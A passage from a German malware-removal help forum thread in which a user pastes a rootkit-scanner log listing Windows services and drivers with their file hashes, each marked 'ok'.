21:27:09.0761 0x0ce4  [ 704B4F81729F676BBF034529FC334D82, 1E50DAF97836807A500284385D99272780A8B69CA88761250451060B207824F8 ] SkypeUpdate     C:\Program Files (x86)\Skype\Updater\Updater.exe
21:27:09.0771 0x0ce4  SkypeUpdate - ok
21:27:09.0774 0x0ce4  [ 70A2FD5F5B7B1A5E1146BE45E4DFB75D, 598824F06BBC2E37B9A6474411637C73233C8D2E13AE963C3229279A8519A9D3 ] smphost         C:\WINDOWS\System32\smphost.dll
21:27:09.0787 0x0ce4  smphost - ok
21:27:09.0797 0x0ce4  [ CB001810FD0C56F1D57229D023A84AE8, E423B53EE3A3710D6F45CD14C8BA5EF8E955344C8477385D470E6687FC661A75 ] SmsRouter       C:\WINDOWS\system32\SmsRouterSvc.dll
21:27:09.0824 0x0ce4  SmsRouter - ok
21:27:09.0829 0x0ce4  [ 17B685A6DBD7543D2A55739526361583, EAF3C4DE587866D04CF9B051E5CEE335BC84788C8C62816AF404B6AD24FF1482 ] SNMPTRAP        C:\WINDOWS\System32\snmptrap.exe
21:27:09.0838 0x0ce4  SNMPTRAP - ok
21:27:09.0848 0x0ce4  [ 2334ED0B61CAE7E7B1B454674206CDAC, 4EAA11805C2282E0306A381CF56E4B28D83C68BA1B401BFD512AE70C05C8A4CD ] spaceport       C:\WINDOWS\system32\drivers\spaceport.sys
21:27:09.0863 0x0ce4  spaceport - ok
21:27:09.0867 0x0ce4  [ F3F0B8CAC1F3E6C3382EAFCE762475AD, 9F2EB373FB9216CDA71965979EE5E18F3AFDD26FF7E0C09DD7C3D880205C2554 ] SpatialGraphFilter C:\WINDOWS\system32\drivers\SpatialGraphFilter.sys
21:27:09.0873 0x0ce4  SpatialGraphFilter - ok
21:27:09.0876 0x0ce4  [ 83E82B0E292DCDE4C75B9241BF0FB300, 494D2FD4CD082CC416CA5FF1ABE06BDC65A769F371CF0E18AD25C380B45AEE32 ] SpbCx           C:\WINDOWS\system32\drivers\SpbCx.sys
21:27:09.0882 0x0ce4  SpbCx - ok
21:27:09.0898 0x0ce4  [ 10CD42898C9E4849193E78A87337B2E9, 7C4FCB36EE1AF92C6962F14AE6DEF2CB154468EC3963DCDB9BDF8398C98B475B ] spectrum        C:\WINDOWS\system32\spectrum.exe
21:27:09.0923 0x0ce4  spectrum - ok
21:27:09.0937 0x0ce4  [ 29D813B5D84BC2C26BBC607CAA57A675, 2C4D5F4E2F7B6580E22ABF67690B0D32CAF5063DEA79E6F57E565782973F3990 ] Spooler         C:\WINDOWS\System32\spoolsv.exe
21:27:09.0961 0x0ce4  Spooler - ok
21:27:10.0021 0x0ce4  [ E910861720DE6EDFB5CC6158CE3C7E17, 526BA8EEB9EE5312FEC39753D728E05F49AD81132346A354C95D4D4938001E2B ] sppsvc          C:\WINDOWS\system32\sppsvc.exe
21:27:10.0099 0x0ce4  sppsvc - ok
21:27:10.0111 0x0ce4  [ 36EAC4FE629FC036632F13EC14788FD1, 6AEE37816306FE46FA99EADB23E98CE6A6674C11ED847F1F5575926E26B09F9A ] srv             C:\WINDOWS\system32\DRIVERS\srv.sys
21:27:10.0126 0x0ce4  srv - ok
21:27:10.0138 0x0ce4  [ A84B05C7C2A233497BE1D518A662C326, 85B291B6783AD48F2111B46050311A553BE6D6A7C3D90861DC010FA65730D2B5 ] srv2            C:\WINDOWS\system32\DRIVERS\srv2.sys
21:27:10.0160 0x0ce4  srv2 - ok
21:27:10.0166 0x0ce4  [ 0351B28EEDFBD6C8CC69A7224A098CFA, D1D08D63F773CAEEA66585D090C073C0748AE96A2AAE8487E4B8BA54F7E59558 ] srvnet          C:\WINDOWS\system32\DRIVERS\srvnet.sys
21:27:10.0183 0x0ce4  srvnet - ok
21:27:10.0188 0x0ce4  [ E95A6C339AE68515897B2E4C6B0842CA, 29DD7E83CD68432EAE4A7ED92CDA40AA52028F5FBB52152F0A1C752B572C2684 ] SSDPSRV         C:\WINDOWS\System32\ssdpsrv.dll
21:27:10.0207 0x0ce4  SSDPSRV - ok
21:27:10.0213 0x0ce4  [ FBD45746B2EDEECA10CCA6A861F8049B, 34383B0A07A93E0FA89CA32CD45AC5061F73723B2A9E0BF4AF93A53F70F1678E ] SstpSvc         C:\WINDOWS\system32\sstpsvc.dll
21:27:10.0225 0x0ce4  SstpSvc - ok
21:27:10.0230 0x0ce4  [ 592FF34A2FD6C6351B8A3AA76B2C0A9E, 152B7472DE531AC45492F562DD470B2CE33F1EEF13BC78F26046AE5ABF54E32F ] ssudmdm         C:\WINDOWS\system32\DRIVERS\ssudmdm.sys
21:27:10.0237 0x0ce4  ssudmdm - ok
21:27:10.0250 0x0ce4  [ 7DB9E612A2742ACEAB080B882E83141C, FFD1FA36E732F55223F3F4B5F845331DBB3073B023C2C5BF51A0E7680DEE7FA7 ] ss_conn_service C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
21:27:10.0264 0x0ce4  ss_conn_service - ok
21:27:10.0337 0x0ce4  [ F1A5AC00B8CD7E28BBC8DD7E60D48B65, AC185DD46A8B63500DDE74C2446F6409B0B4612068C33B4B7C30E43F389908DF ] StateRepository C:\WINDOWS\system32\windows.staterepository.dll
21:27:10.0427 0x0ce4  StateRepository - ok
21:27:10.0454 0x0ce4  [ C8DC0C34715627ABF7A265ED27D1F75A, 5B8B9AC65D7458A8C6C868107E0BE3F9B1A1A5117FC69FDC260BAA9F1BDD0008 ] Steam Client Service C:\Program Files (x86)\Common Files\Steam\SteamService.exe
21:27:10.0479 0x0ce4  Steam Client Service - ok
21:27:10.0483 0x0ce4  [ D40C589F80EB1C511263D0547C0259AE, A0236F6BB515AE006CC4C9F40FCCE250407888757A3646BB4BCB59EF8EEF1311 ] stexstor        C:\WINDOWS\system32\drivers\stexstor.sys
21:27:10.0489 0x0ce4  stexstor - ok
21:27:10.0500 0x0ce4  [ F83F43CD328E6CEEAAC27612F3EB1FF5, E3D35E5154CD228301806706E6EADCA36E9113EAF44BC06E3C43B2E902187326 ] stisvc          C:\WINDOWS\System32\wiaservc.dll
21:27:10.0522 0x0ce4  stisvc - ok
21:27:10.0527 0x0ce4  [ 63F1C499672A1049F0814F243798F35F, 65B39E2AFC48E8F5754296DC72183EE505677D7FCD8909D4975629D6AA849DC0 ] storahci        C:\WINDOWS\system32\drivers\storahci.sys
21:27:10.0535 0x0ce4  storahci - ok
21:27:10.0538 0x0ce4  [ E5F703788DFA05411F1469E96838F438, A7E8D2DC23E23EA52B068C71D9387E69FF49798A27CE0243A994A2B1B09FA042 ] storflt         C:\WINDOWS\system32\drivers\vmstorfl.sys
21:27:10.0544 0x0ce4  storflt - ok
21:27:10.0547 0x0ce4  [ 0D0128244FF55EAD3F878D3FE542DBA5, 4FCFA1B2113E07264A71A22298CA6E9FDC2AB722E0AE184A8F5656C18113A858 ] stornvme        C:\WINDOWS\system32\drivers\stornvme.sys
21:27:10.0554 0x0ce4  stornvme - ok
21:27:10.0558 0x0ce4  [ 3A62FF78619258E6126C5C4B4CC82C8E, C72CC295680B35E0EEE5A5310E0241E2FFE0E540BFAA49C35C06AA882229C1CD ] storqosflt      C:\WINDOWS\system32\drivers\storqosflt.sys
21:27:10.0565 0x0ce4  storqosflt - ok
21:27:10.0578 0x0ce4  [ 212CB512B785E218667CCA56C4BFD71D, 5FD4CFEE5AB2187D928632076E6AD5C2C53D66884479C4D34930DCFCA3CCEE34 ] StorSvc         C:\WINDOWS\system32\storsvc.dll
21:27:10.0600 0x0ce4  StorSvc - ok
21:27:10.0604 0x0ce4  [ C6097966F8EA3B288070CDF7C3C8C3E8, D12C4AF3E54DCE1E5DC9C8AA0E83420F481DC0165A7F7845083A85BABC102D37 ] storufs         C:\WINDOWS\system32\drivers\storufs.sys
21:27:10.0609 0x0ce4  storufs - ok
21:27:10.0612 0x0ce4  [ 3DC3B17E92DA02E36B4138733DF6C1AC, 398F20B6D6DAF6DA950C149F63F3B23864E1478119BFE53218C220CEADEC800D ] storvsc         C:\WINDOWS\system32\drivers\storvsc.sys
21:27:10.0618 0x0ce4  storvsc - ok
21:27:10.0621 0x0ce4  [ D284AB2CA6C30317D142D38CE1F848BE, 4C9EAE174F5C673CA550C9382E85CE7DAF5DC9965495BAB09078B634A4CDD4FB ] svsvc           C:\WINDOWS\system32\svsvc.dll
21:27:10.0631 0x0ce4  svsvc - ok
21:27:10.0634 0x0ce4  [ 2BC4D0EBC2467FE90302AE0AFAF23768, CF8BCC9CA1FBA8407FD044613A2497BEEC641DE463B076F0ED1FA7674C202ADE ] swenum          C:\WINDOWS\System32\drivers\swenum.sys
21:27:10.0640 0x0ce4  swenum - ok
21:27:10.0648 0x0ce4  [ 13985DA558FBCBFD9108A2CACB5FE494, DD457A73E82147AA90C36D695A47E862FF90D96FB1E22760FAB5780F7C332A46 ] swprv           C:\WINDOWS\System32\swprv.dll
21:27:10.0667 0x0ce4  swprv - ok
21:27:10.0671 0x0ce4  [ 572F81CF08972D53BAFFC2A110A2A586, D9AF8EBB31CE097849F93FC8C0F06178B2E1CA8C48D08BBDD85174CCD64A16D6 ] Synth3dVsc      C:\WINDOWS\System32\drivers\Synth3dVsc.sys
21:27:10.0679 0x0ce4  Synth3dVsc - ok
21:27:10.0694 0x0ce4  [ 4746E7782AABDDC950E94336C03D3D4E, B583CB003D364F82B6C45932CC119FF8D5555E3E0B2D75B861B34C1B6AB6509B ] SysMain         C:\WINDOWS\system32\sysmain.dll
21:27:10.0727 0x0ce4  SysMain - ok
21:27:10.0734 0x0ce4  [ 97E0FD613D031EAA73E8AD259169AC22, E86E9B9C18AF2E79D7CF80B177A12D89418CDBD3CBB74307809DD0377408DB82 ] SystemEventsBroker C:\WINDOWS\System32\SystemEventsBrokerServer.dll
21:27:10.0748 0x0ce4  SystemEventsBroker - ok
21:27:10.0753 0x0ce4  [ 7750219DFABC38261575B6CEFBF84EC6, 50DF85E34AF7C1343281AD0EF34FD94AB0E279DA5C61976ABA0135B8F013C543 ] TabletInputService C:\WINDOWS\System32\TabSvc.dll
21:27:10.0763 0x0ce4  TabletInputService - ok
21:27:10.0770 0x0ce4  [ C1C6A802C2A9A57029D4347E251F4D18, 9F75B7F003C829FFDB2CDC98231D32FE988754D23873048FA4F6EB82ED1DCED4 ] TapiSrv         C:\WINDOWS\System32\tapisrv.dll
21:27:10.0784 0x0ce4  TapiSrv - ok
21:27:10.0821 0x0ce4  [ 0907BD52E5264C0851A839D471F35DA0, 6301E98E343F72AD8F10C3AAED3EFD60221EC43206BD6740DD0CD8DF3ECBB5F5 ] Tcpip           C:\WINDOWS\system32\drivers\tcpip.sys
21:27:10.0867 0x0ce4  Tcpip - ok
21:27:10.0907 0x0ce4  [ 0907BD52E5264C0851A839D471F35DA0, 6301E98E343F72AD8F10C3AAED3EFD60221EC43206BD6740DD0CD8DF3ECBB5F5 ] Tcpip6          C:\WINDOWS\system32\drivers\tcpip.sys
21:27:10.0954 0x0ce4  Tcpip6 - ok
21:27:10.0961 0x0ce4  [ 1C35A5C62D110346379C55E39A3D547C, 5BDBD593AB51ECA5A6B703E86F300E3B2B153E128BEB9A006ABD827AE726BD62 ] tcpipreg        C:\WINDOWS\system32\drivers\tcpipreg.sys
21:27:10.0970 0x0ce4  tcpipreg - ok
21:27:10.0975 0x0ce4  [ 2540384EF2EEE5BE930E3FB1061395DC, 53BACC0718967E0860BAE1EB2DECDD3960FA19AC47066C5DFCE03AA0427BB654 ] tdx             C:\WINDOWS\system32\DRIVERS\tdx.sys
21:27:10.0982 0x0ce4  tdx - ok
21:27:10.0985 0x0ce4  [ 96A35CDBA661D41C5A3914257CA1D200, 691ABBAA99C673E7D0B81D811BCC60976C3EC050F2B39B35B87A3BCC211F119A ] terminpt        C:\WINDOWS\System32\drivers\terminpt.sys
21:27:10.0991 0x0ce4  terminpt - ok
21:27:11.0007 0x0ce4  [ 0B5C6D1683CDE89B3488326C60EA6EF2, 3B822CF005FA3002F27FF9BF39E7E133987230DA3481CFCF99F3B2B6B373A718 ] TermService     C:\WINDOWS\System32\termsrv.dll
21:27:11.0036 0x0ce4  TermService - ok
21:27:11.0040 0x0ce4  [ 6568EF1B30101979107055B7E515EE58, A318082E5FDD79C9F85E8C00A78EBFA0EC44B1046976E85633DC7BD123DA38B9 ] Themes          C:\WINDOWS\system32\themeservice.dll
21:27:11.0052 0x0ce4  Themes - ok
21:27:11.0059 0x0ce4  [ 2ABC11CFC2F03A919AF78A6E3E29C570, 54D91F89993A0FF090E2213EED92DE3659DCB693FBDA5932E31C6D6D7CFC8E80 ] TieringEngineService C:\WINDOWS\system32\TieringEngineService.exe
21:27:11.0075 0x0ce4  TieringEngineService - ok
21:27:11.0086 0x0ce4  [ 8949EED671F531E7B4A0FD7333CCC125, 2D55A1B4FD6843A11383BB71D0409943CA0C47350153F3EDAAA3CADFA4A3504A ] tiledatamodelsvc C:\WINDOWS\system32\tileobjserver.dll
21:27:11.0107 0x0ce4  tiledatamodelsvc - ok
21:27:11.0112 0x0ce4  [ E59D4F92FE11B47AB727C6D192CC977F, 1DA06663889A20A1B22DDF90E5C99A5668023C0B89E252F3E820C0D1964B1948 ] TimeBrokerSvc   C:\WINDOWS\System32\TimeBrokerServer.dll
21:27:11.0123 0x0ce4  TimeBrokerSvc - ok
21:27:11.0139 0x0ce4  [ C83505A5CC15E39D6C6D7B3C20187E5C, A6AB47C041A7C99CB0D5EA706CC31B3D88DC83BAF5AF7E59F651F9D7068D94B2 ] TokenBroker     C:\WINDOWS\System32\TokenBroker.dll
21:27:11.0168 0x0ce4  TokenBroker - ok
21:27:11.0174 0x0ce4  [ 13878331EB3906C29A1F4E46B9606218, 892C17BBB35E72B36AE5F16124DFD5D8D7151260A370C142EBDD1D14EAD42AB9 ] TPM             C:\WINDOWS\System32\drivers\tpm.sys
21:27:11.0183 0x0ce4  TPM - ok
21:27:11.0187 0x0ce4  [ 85E0D4431D61675A94EA99C9E1F56436, 9FA750703E04D20A62DBB0185CBDD70AFC4573FB65F86E61AAF7CF7A7D8E1E3E ] TrkWks          C:\WINDOWS\System32\trkwks.dll
21:27:11.0197 0x0ce4  TrkWks - ok
21:27:11.0206 0x0ce4  [ AA129EFF64E41947F6A46388A7F5F966, CB3699055EA62F1BE132CDBA1F728C86B48625E4F63A2FD78C686D52A4265906 ] trufos          C:\WINDOWS\system32\DRIVERS\trufos.sys
         

Alt 21.05.2017, 21:30   #10
dinoexe
 
Trojaner, Adware oder sonstiges ? - Standard

Trojaner, Adware oder sonstiges ?



Code:
ATTFilter
21:27:11.0218 0x0ce4  trufos - ok
21:27:11.0222 0x0ce4  [ F21A69013A67B372675F523262AC1E33, C3F910E375C0F4B7FFA6F6D755622FF6B0CAE36DF691C938DE177C94815FE3C8 ] TrustedInstaller C:\WINDOWS\servicing\TrustedInstaller.exe
21:27:11.0231 0x0ce4  TrustedInstaller - ok
21:27:11.0236 0x0ce4  [ 9856BCCD1CD5DE4D17E8DBBA7CEFC688, F4B532DCE6F4728092848FE7B2FC05AB921EC7B3FDD7E62AB40EE0029C008398 ] TsUsbFlt        C:\WINDOWS\system32\drivers\tsusbflt.sys
21:27:11.0244 0x0ce4  TsUsbFlt - ok
21:27:11.0246 0x0ce4  [ 837AD2B941E721BCCEB7EF137E2DEE18, 84BE22616A50467B1957434C8BD19C8B0FC3B21CD77FFB8E16A09347CEAE0F4E ] TsUsbGD         C:\WINDOWS\System32\drivers\TsUsbGD.sys
21:27:11.0253 0x0ce4  TsUsbGD - ok
21:27:11.0257 0x0ce4  [ 5DED9E34D133F4A363652CDB595D83F3, E8CFE5DF737D7C2A576B2D6D508977E1F6961122D541DF82AA581C7B3B1C384B ] tsusbhub        C:\WINDOWS\system32\drivers\tsusbhub.sys
21:27:11.0266 0x0ce4  tsusbhub - ok
21:27:11.0271 0x0ce4  [ B3142C6118703E98EB0510CF7B43D0F2, 40FDCBAA2AD93026AD479BF8C1B4EE7A4E2E65590608B6B1C5DEB3C4716E5C03 ] tunnel          C:\WINDOWS\System32\drivers\tunnel.sys
21:27:11.0287 0x0ce4  tunnel - ok
21:27:11.0291 0x0ce4  [ B097B77121A057AB6D70C647636978D4, 10F78A18AC898CDD0FA91D6FA29B8B45C6D8F6CE65B064C39256EB20FC6CD085 ] tzautoupdate    C:\WINDOWS\system32\tzautoupdate.dll
21:27:11.0301 0x0ce4  tzautoupdate - ok
21:27:11.0305 0x0ce4  [ B4C846ABD462558D45CA578C855759C3, E0F0DD39A6C101C2209CA46EF2B5A5F4559843C9EE37CC08ED78D9E124A566D2 ] UASPStor        C:\WINDOWS\System32\drivers\uaspstor.sys
21:27:11.0311 0x0ce4  UASPStor - ok
21:27:11.0315 0x0ce4  [ 5C2C0296D9EE7DC92A3F14642FBE656D, 94A7D549EC53C71095AD8DE4DB8F846D1DB3438FE2679E41DCAE62C34C0654DD ] UcmCx0101       C:\WINDOWS\system32\Drivers\UcmCx.sys
21:27:11.0323 0x0ce4  UcmCx0101 - ok
21:27:11.0328 0x0ce4  [ 8BB64E04CD97AD8C68543181D93E2AFC, FBA2FB9A9906721BAD42CDFFCCE0234AF3F72B83E2571E526801F19173B7C9CE ] UcmTcpciCx0101  C:\WINDOWS\system32\Drivers\UcmTcpciCx.sys
21:27:11.0338 0x0ce4  UcmTcpciCx0101 - ok
21:27:11.0341 0x0ce4  [ 5A7CE114C8DA9060F32633F81A5625E5, B49163951B380827ADBF13D336D5BDC1EEE90A70058019928A603AA1C24D8EB7 ] UcmUcsi         C:\WINDOWS\System32\drivers\UcmUcsi.sys
21:27:11.0348 0x0ce4  UcmUcsi - ok
21:27:11.0353 0x0ce4  [ 5D4EAF3D0911338CB8FDB088386D6DCA, 1AC5B494C39570E66C4D4F867C6B8E37C174FB5D67C2865B07247122F60F8895 ] Ucx01000        C:\WINDOWS\system32\drivers\ucx01000.sys
21:27:11.0362 0x0ce4  Ucx01000 - ok
21:27:11.0364 0x0ce4  [ 384E1F0D84B465820416338E52FE7C2B, 8F82778332EA1199987BA569536CBED8FEAF5E9D920321B0C9DFCBDDD91EEA35 ] UdeCx           C:\WINDOWS\system32\drivers\udecx.sys
21:27:11.0372 0x0ce4  UdeCx - ok
21:27:11.0379 0x0ce4  [ C82BE75239D412057C9E3DB1785680C6, AE712E40440F5725DA41C95C3E558B5E9ABB17C55B70297DD40D7D1BDA7CE45D ] udfs            C:\WINDOWS\system32\DRIVERS\udfs.sys
21:27:11.0397 0x0ce4  udfs - ok
21:27:11.0400 0x0ce4  [ CCDF6EFF952BF3BF34DC17600F479397, 2A2009B3C4BD1A44F1C6E334CB0A7DD02443BCE1EB48837C1C70A2A04CC7C54A ] UEFI            C:\WINDOWS\System32\drivers\UEFI.sys
21:27:11.0406 0x0ce4  UEFI - ok
21:27:11.0409 0x0ce4  [ 244A80A1A881E2B9303A0364AAB33F16, 3C58D5D5B1AF6AB598E6450817381E7D6B8700151B66DCDAD6002E73BD0EDF27 ] UevAgentDriver  C:\WINDOWS\system32\drivers\UevAgentDriver.sys
21:27:11.0414 0x0ce4  UevAgentDriver - ok
21:27:11.0432 0x0ce4  [ 5F1DA3635C2F6B74EBFDEBFC747B63B5, 1B456B777C5099A67E405FEF20B5CBCB24C6FCE9ED7A5A421C6574618364FD47 ] UevAgentService C:\WINDOWS\system32\AgentService.exe
21:27:11.0463 0x0ce4  UevAgentService - ok
21:27:11.0470 0x0ce4  [ 00BEF71C45FD6B06E7525E7B31EFA88C, C0BDE8CB41BF9A34E395EA86756637E4CD6B88EF1C842364ECA639948D6CD59A ] Ufx01000        C:\WINDOWS\system32\drivers\ufx01000.sys
21:27:11.0479 0x0ce4  Ufx01000 - ok
21:27:11.0482 0x0ce4  [ 9450AB15C30CF7D1F23C8A42E778C3A2, E62455008ED5B7220AEE62E0F459A67E26FB2878349ABA5AAF0164C2E7A8C0E9 ] UfxChipidea     C:\WINDOWS\System32\drivers\UfxChipidea.sys
21:27:11.0489 0x0ce4  UfxChipidea - ok
21:27:11.0493 0x0ce4  [ CEE12C7A689BDF448715024A7E0EB9C3, EC48E1469800E34A71C8A97A6F2F0B7C67385BCB8438844E6967DE0A82E39B94 ] ufxsynopsys     C:\WINDOWS\System32\drivers\ufxsynopsys.sys
21:27:11.0501 0x0ce4  ufxsynopsys - ok
21:27:11.0506 0x0ce4  [ 5A2F610B31CC3FD23D3E20C1D5F1EF52, D470B7C1CAE066C2DCDBA47001913FB1A7C9CC5B200FB8324DB896B641C1A132 ] UI0Detect       C:\WINDOWS\system32\UI0Detect.exe
21:27:11.0516 0x0ce4  UI0Detect - ok
21:27:11.0519 0x0ce4  [ F39ED750EDF5948FA8CD99D1F4EC9372, AE42AE50DE09F26D3CA4ACDCD5ECABD59D26926707030F0532A885266FE83EF9 ] umbus           C:\WINDOWS\System32\drivers\umbus.sys
21:27:11.0527 0x0ce4  umbus - ok
21:27:11.0529 0x0ce4  [ 55984D4E64C2F8E4223542CBCC15EDEB, ECBC832FBBA6AFCAEDEBB2728FA4A6DDCF52A6421929E72CA29B61CDBED840DF ] UmPass          C:\WINDOWS\System32\drivers\umpass.sys
21:27:11.0536 0x0ce4  UmPass - ok
21:27:11.0542 0x0ce4  [ FBEF4641E3E08A03CA84AF5C393CA86B, 9A14A0FB645AB6DD0B49F3A14FBF38FECC65796F2503324E93994113CC7AD52F ] UmRdpService    C:\WINDOWS\System32\umrdp.dll
21:27:11.0555 0x0ce4  UmRdpService - ok
21:27:11.0573 0x0ce4  [ 3699DED879B2FF8FC1ECE91489109796, 05B1283256F6CA6AF3ABBE003360BF0BAB3400223092E7E9F0822120BF576BD2 ] UnistoreSvc     C:\WINDOWS\System32\unistore.dll
21:27:11.0605 0x0ce4  UnistoreSvc - ok
21:27:11.0616 0x0ce4  [ C01212FAF3D89703E52CC17BC74261D4, 5621C4813A6251AEC0A0C6C56338C2F47B531CE59CD22F43B2474D9513D4B94B ] UPDATESRV       C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
21:27:11.0624 0x0ce4  UPDATESRV - ok
21:27:11.0633 0x0ce4  [ BBB6BDBE5ADCE6F87F70623D5A1EC5BC, E8BD5804FF82417890A9D1A44096B174E81A8C7AD3059B1F0C62740E0B39D137 ] upnphost        C:\WINDOWS\System32\upnphost.dll
21:27:11.0656 0x0ce4  upnphost - ok
21:27:11.0660 0x0ce4  [ 4D23214CB8B1C36B82061280EB8FDAB3, 387C01A7F9D8F89ED894EDF894AAAF8830DD7C90DF2F12A2CB4C4E9C7CB773BE ] UrsChipidea     C:\WINDOWS\System32\drivers\urschipidea.sys
21:27:11.0665 0x0ce4  UrsChipidea - ok
21:27:11.0669 0x0ce4  [ 4329D880DB96B504F0DDC991A7374CCD, 1486BEF2C03ED281B24A17D3C18FEA2360E37A6B46D1A67D4690CD871B0A13DA ] UrsCx01000      C:\WINDOWS\system32\drivers\urscx01000.sys
21:27:11.0675 0x0ce4  UrsCx01000 - ok
21:27:11.0678 0x0ce4  [ 93FAD0AC5879F274FA248A49E3F3EA33, D936F408E23040B33F30AB3B43D8B8BB9F3CCF2549E821F4C47357987AFF386F ] UrsSynopsys     C:\WINDOWS\System32\drivers\urssynopsys.sys
21:27:11.0683 0x0ce4  UrsSynopsys - ok
21:27:11.0688 0x0ce4  [ 6B09AA6A04C8261E787B6523229E7159, F97BED424E988AC6272D51025FD0D3180E89BAF0FFC83DAB609774D6269B353A ] usbccgp         C:\WINDOWS\System32\drivers\usbccgp.sys
21:27:11.0696 0x0ce4  usbccgp - ok
21:27:11.0700 0x0ce4  [ ECE3AD18B4C22ED0C4AB1A2AD9AC32C8, 2062D400305075E886CF2C9D710A1C48B3F4AD48E7A75A77C66547357E96CB6E ] usbcir          C:\WINDOWS\System32\drivers\usbcir.sys
21:27:11.0709 0x0ce4  usbcir - ok
21:27:11.0713 0x0ce4  [ F8BCB536866474C6D8008F4C69B778A1, F86F4330DE2F50D48559C1ED46168ADB8F6AA7C8FE3834FFE00085C1783C5750 ] usbehci         C:\WINDOWS\System32\drivers\usbehci.sys
21:27:11.0719 0x0ce4  usbehci - ok
21:27:11.0729 0x0ce4  [ 1F723DA014062DBF3288B408A7611845, 0CCC9360259E6FBC510BBF69AE991A53A92516023AAC32C60A44BD3B43371C66 ] usbhub          C:\WINDOWS\System32\drivers\usbhub.sys
21:27:11.0742 0x0ce4  usbhub - ok
21:27:11.0752 0x0ce4  [ C3F953D10C486D6A190AF548B3CF7DC9, B0FB45B3045D499A44853A9D4CFD39C9D92873FC0A62A3D76B6149E601DFECD8 ] USBHUB3         C:\WINDOWS\System32\drivers\UsbHub3.sys
21:27:11.0766 0x0ce4  USBHUB3 - ok
21:27:11.0770 0x0ce4  [ BE6ED98FD0D3FE5FB11762AD7CCD6C96, 54C6C929CA55EA6770474F7E230190FC7574C1FA52437B564B3B5FA4D6106D8A ] usbohci         C:\WINDOWS\System32\drivers\usbohci.sys
21:27:11.0776 0x0ce4  usbohci - ok
21:27:11.0779 0x0ce4  [ CEE43CD5357DB8786CE6E2C430841AE4, 50F4629AE488A12D18EFFAD486D2F95545049AB1F6A3248BA44D2132EEC9A653 ] usbprint        C:\WINDOWS\System32\drivers\usbprint.sys
21:27:11.0786 0x0ce4  usbprint - ok
21:27:11.0790 0x0ce4  [ 99F0738B320B7A8D11351A32F68AA5F1, DAA887C31E3F56245C15F04044C12B6E832FA7E837F4107376A6F8D8E3A99FEC ] usbser          C:\WINDOWS\System32\drivers\usbser.sys
21:27:11.0797 0x0ce4  usbser - ok
21:27:11.0802 0x0ce4  [ 67E26F56CF7EACCBD9C9F75343A3D7C2, 210FA280897CCCB2458E9E683A8B4CA8A5DF9606B54F8B9CE05CA4AA6FD810AB ] USBSTOR         C:\WINDOWS\System32\drivers\USBSTOR.SYS
21:27:11.0809 0x0ce4  USBSTOR - ok
21:27:11.0812 0x0ce4  [ 7BA802C9F73A84B75BB22538ADA495BE, 7D97E6305168C4CA86AB9BD5B63300156DFE97032251CB83DB1D4C4DB9C28DC8 ] usbuhci         C:\WINDOWS\System32\drivers\usbuhci.sys
21:27:11.0819 0x0ce4  usbuhci - ok
21:27:11.0827 0x0ce4  [ 50E70B3A95138AA4A30B095270EE0DE6, 9B7072C36230102A089C4A6DFE1980CD9DB28E566EF02830600DEBAF3AAD31C7 ] USBXHCI         C:\WINDOWS\System32\drivers\USBXHCI.SYS
21:27:11.0838 0x0ce4  USBXHCI - ok
21:27:11.0861 0x0ce4  [ 3156FFFB2B3BF5375814F777D343AD9F, C4E63043EB9D9227CDD487608AF9BA25C755D85E5FF8E63C2079D68CCC79E4BB ] UserDataSvc     C:\WINDOWS\System32\userdataservice.dll
21:27:11.0902 0x0ce4  UserDataSvc - ok
21:27:11.0919 0x0ce4  [ C0E60CC6D48013728C7E4168D61A0B39, CA283312E9669BCC74A3B5E6332502D1CAA7148C049B94AF3996F3C7CD2676EF ] UserManager     C:\WINDOWS\System32\usermgr.dll
21:27:11.0949 0x0ce4  UserManager - ok
21:27:11.0961 0x0ce4  [ C71F447901864A61698B9FA2CF538146, 13673F28E6AE2CE8AB20ECF93997B49A355087F72970FE0BA7319B629DB3D36E ] UsoSvc          C:\WINDOWS\system32\usocore.dll
21:27:11.0983 0x0ce4  UsoSvc - ok
21:27:11.0987 0x0ce4  [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] VaultSvc        C:\WINDOWS\system32\lsass.exe
21:27:11.0994 0x0ce4  VaultSvc - ok
21:27:11.0997 0x0ce4  [ C1EC9211C7759D2487FD30934AA3EE96, 6914BB8B44550DFE75E5A3772E93ADF8459EB621CA400BDD9B7E3185A09B6F9A ] vdrvroot        C:\WINDOWS\system32\drivers\vdrvroot.sys
21:27:12.0003 0x0ce4  vdrvroot - ok
21:27:12.0014 0x0ce4  [ 374CD93271184F04988FDC1C25B3E855, 09727093C5F7B258867C16D41F7F9835BF549CC339288BFE01A8F34AC7E93E23 ] vds             C:\WINDOWS\System32\vds.exe
21:27:12.0038 0x0ce4  vds - ok
21:27:12.0044 0x0ce4  [ C83F3BC00651448DB127D497CF955089, 31B8838CEED08E7D5DD8635A805A8010798BD9B10A3775FAFDB576FBD7303D39 ] VerifierExt     C:\WINDOWS\system32\drivers\VerifierExt.sys
21:27:12.0052 0x0ce4  VerifierExt - ok
21:27:12.0064 0x0ce4  [ 1021DCD0E3632E099E599B8893DC7969, 18A4F022240FBBDAEEAF6613E88F1B89370EE8BE575059657FEA451D7DA1FE75 ] vhdmp           C:\WINDOWS\System32\drivers\vhdmp.sys
21:27:12.0081 0x0ce4  vhdmp - ok
21:27:12.0085 0x0ce4  [ 1AD096A5C00E522398D0092D875A8CB6, 6959FCD6DD2115CD293DBD4BCD6D1BA0AE4F7495A9BBB48F7388384EEABB38E9 ] vhf             C:\WINDOWS\System32\drivers\vhf.sys
21:27:12.0092 0x0ce4  vhf - ok
21:27:12.0096 0x0ce4  [ EE9A22CFD9AEDD7B52F98B0272494609, F668131BABD048857F011A471936B52EDF0F2A42CB6000ACB4E0E43F88782AAD ] vmbus           C:\WINDOWS\system32\drivers\vmbus.sys
21:27:12.0103 0x0ce4  vmbus - ok
21:27:12.0106 0x0ce4  [ BFBD0895926FD98A03AD6BB845B569B7, 5B7913ACD6CC132B2F36B079BC5F897C21884A7F21046B8996CC3D74C4B6DA4C ] VMBusHID        C:\WINDOWS\System32\drivers\VMBusHID.sys
21:27:12.0112 0x0ce4  VMBusHID - ok
21:27:12.0115 0x0ce4  [ C123C97D351C56C75FE5335AB18255EE, 67315E332E863E5C233BA113826A5DEEE08C1A0A3358E6AC21F25DC5EAC86D07 ] vmgid           C:\WINDOWS\System32\drivers\vmgid.sys
